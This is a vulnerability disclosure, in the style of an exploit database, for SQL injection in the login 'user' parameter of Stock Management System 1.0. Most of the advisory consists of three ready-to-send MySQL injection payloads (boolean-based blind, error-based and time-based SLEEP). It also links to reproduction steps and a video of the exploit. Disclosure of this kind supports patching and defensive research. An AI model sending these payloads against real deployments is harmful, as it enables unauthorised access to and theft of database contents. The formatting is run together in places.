Stock Management System 2022 1.0 From Erick Cesar SQL Injection

## Title: Stock-Management-System-2022-1.0-from-Erick-Cesar Multiple SQLi## Author: nu11secur1ty## Date: 12.22.2022## Vendor: https://github.com/rickxy/Stock-Management-System## Software: https://github.com/rickxy/Stock-Management-System## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/rickxy/2022/Stock-Management-System-1.0## Description:The `user` parameter appears to be vulnerable to SQL injection attacks.The payload ' was submitted in the user parameter, and a databaseerror message was returned.The attacker can still all information for the system by using thisvulnerability.## STATUS: HIGH Vulnerability - CRITICAL[+] Payload:```MySQL---Parameter: user (POST)    Type: boolean-based blind    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BYor GROUP BY clause    Payload: user=bqxDgfIK' RLIKE (SELECT (CASE WHEN (8457=8457) THEN0x627178446766494b ELSE 0x28 END)) AND'BTvs'='BTvs&password=s9U!o7d!C0&btnlogin=    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: user=bqxDgfIK' AND (SELECT 5004 FROM(SELECTCOUNT(*),CONCAT(0x7178767071,(SELECT(ELT(5004=5004,1))),0x7171707a71,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND'aQfu'='aQfu&password=s9U!o7d!C0&btnlogin=    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: user=bqxDgfIK' AND (SELECT 8137 FROM(SELECT(SLEEP(7)))nCyy) AND 'vQsi'='vQsi&password=s9U!o7d!C0&btnlogin=---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/rickxy/2022/Stock-Management-System-1.0)## Proof and Exploit:[href](https://streamable.com/gg7pyf)## Time spent`00:05:00`## Writing an exploit`00:05:00`